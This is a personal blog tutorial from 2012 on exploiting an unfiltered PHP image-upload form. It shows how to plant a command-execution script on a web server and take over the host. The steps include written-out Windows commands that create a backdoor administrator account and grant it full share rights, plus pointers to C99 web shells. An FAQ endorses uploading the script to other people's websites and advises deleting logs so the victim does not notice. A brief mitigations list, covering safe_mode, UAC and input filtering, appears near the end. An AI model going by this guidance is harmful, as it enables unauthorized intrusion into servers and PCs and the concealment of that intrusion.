Date : June 2, 2012
Type : Tutorial
Level : Easy
Actually this post was a little bit different with my other posts because I put the date attribute on the top of this post. Actually its because today was my birthday and I want to say thank you to all of the follower of this blog in twitter, facebook (that reach 1K more in my birthday 🙂 ), networkedblogs, e-mail, or you that came here from Google, Baidu, Yahoo, Bing, etc. It's because all of you I really love to wrote this tutorial and sharing blog to share with all of you. Thank you…
today quote for me and also for my blog readers :
The title sounds provocative 😛 but it's true that with your PHP code, you can hack a system or someone PC or even a web server.
Today tutorial background story was from my experience as a university student…
In Indonesia while I was pursuing my bachelor degree (around 2002-2003) I live by rent a room, so it's a house with many rooms and the owner rent it so they can get monthly fee by student who live there, in Indonesian language its called "nge-kost". I live with some of my friend that pursuing the same degree in computer field and we also have the same homework about how to upload an image to web server 😛 .
Here's the network topology of my "kost" on that time :
We can access other users if we have access to that PC(common LAN topology isn't?), and port 80 was a public port and everyone can use it.
We do that homework together and of course I know in which folder he make that upload feature(because we test it together).
To make this hack work PHP safe_mode should set to OFF, but usually for web development many developer or new learning users use XAMPP or WAMP, etc which came with default safe_mode set to OFF. The other thing was there's no extension filter for the type of file that we upload.
Also you need to know the web server was run using which programming language? for this example it was using PHP so it will be different for ASP, JSP, etc.
1. Upload Image PHP Script
2. PHP exec script
Download both files below from mediafire.com:
1. Know the upload feature (in my case was the folder where's my friend put his script for upload feature)
2. Access the address and upload your PHP exec script. In this picture below I'm using myscript.php for PHP exec script name.
3. In this tutorial every uploaded file will be saved on the folder with name "data" on the web server, because I make this script very simple. But in real world if you want to know on which folder the data/image was uploaded, you can follow the trailing slash after the file has been uploaded(in preview section).
4. Now I will access the folder called data with my file inside it called myscript.php, and try to run a simple command dir c:\.
5. As you can see from step 4, now even I can do the command below.
1. net user /add v4L 12345 --> this command will add new user v4L with password 12345 2. net localgroup administrators v4L /add --> this will add username v4L to administrators group 3. net share concfg*C:\/grant:v4L,full --> this command will give the full administrator right to the user.
6. Here's the result 🙂
Only from upload feature and I can own his computer 🙂 …but after that I told him about this and we fixed it together…LoL
1. Turn ON your PHP safe_mode (Click here to view tutorial how to turn on php safe_mode to ON)
2. Always turn ON your UAC (User Account Control) for Vista and Windows 7, because some users turn it off(including me 😛 ) because they don't like some pop up window while run a program…LoL
3. For developer to make sure you always filter and sanitize the data.
1. Can I upload this script on some website?
Answer : Sure of course as long as it's website safe_mode configuration turned OFF and there's no extension filtering. Maybe for advanced functional you can use C99 script or C99madshell, or other script available on the net.
2. Will the user or admin know that if I'm successfully upload this script and execute it?
Answer : maybe for LAN users, make sure you delete all records before he shut down the computer, if not your username will be on his log in window 😛
Hope you found it useful 🙂